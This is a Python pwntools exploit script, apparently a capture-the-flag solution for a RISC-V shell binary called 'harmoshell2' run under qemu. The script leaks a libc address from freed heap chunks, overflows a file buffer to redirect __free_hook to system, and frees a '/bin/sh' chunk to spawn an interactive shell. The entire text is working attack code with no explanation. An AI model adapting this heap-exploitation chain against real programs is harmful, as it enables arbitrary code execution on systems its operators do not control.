1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
| from pwn import *
remote_addr=['',0]
is_remote = False
elf_path = "./harmoshell2"
elf = ELF(elf_path)
libc = ELF("./libs/lib/libc-2.27.so")
context.terminal = ["tmux", "new-window"]
if is_remote:
p=remote(remote_addr[0],remote_addr[1])
else:
p = process(["qemu-riscv64", "-L", "./libs", elf_path], aslr = True)
ru = lambda x : p.recvuntil(x)
sn = lambda x : p.send(x)
rl = lambda : p.recvline()
sl = lambda x : p.sendline(x)
rv = lambda x : p.recv(x)
sa = lambda a,b : p.sendafter(a,b)
sla = lambda a,b : p.sendlineafter(a,b)
def lg(s,addr = None):
if addr:
print('\033[1;31;40m[+] %-15s --> 0x%8x\033[0m'%(s,addr))
else:
print('\033[1;32;40m[-] %-20s \033[0m'%(s))
def raddr(a=6):
if(a==6):
return u64(rv(a).ljust(8,'\x00'))
else:
return u64(rl().strip('\n').ljust(8,'\x00'))
def choice(idx):
sla("$ ", str(idx))
def touchfile(filename):
choice("touch " + filename)
def echo(filename, content, is_append = False):
if is_append == True:
choice("echo >> " + filename)
else:
choice("echo > " + filename)
sleep(1)
sn(content)
def rm(filename):
choice("rm " + filename)
def show(filename):
choice("cat " + filename)
ru("Content: ")
if __name__ == '__main__':
for i in range(20):
touchfile('B' + hex(i)[2:])
for i in range(20):
rm('B' + hex(i)[2:])
for i in range(8):
touchfile('B' + hex(i)[2:])
show('B7')
libc_addr = u64(rl().strip().ljust(8, '\x00')) + 0x4000000000 - 0x1079f8
lg("libc", libc_addr)
libc.address = libc_addr
echo("B2", '/bin/sh\x00' + "A"*0xf8)
echo("B2", p64(0)*2 + 'B'*8 + p64(0) + p64(libc.symbols['__free_hook']), True)
echo('B'*8, p64(libc.symbols['system']))
rm('B2')
p.interactive()
|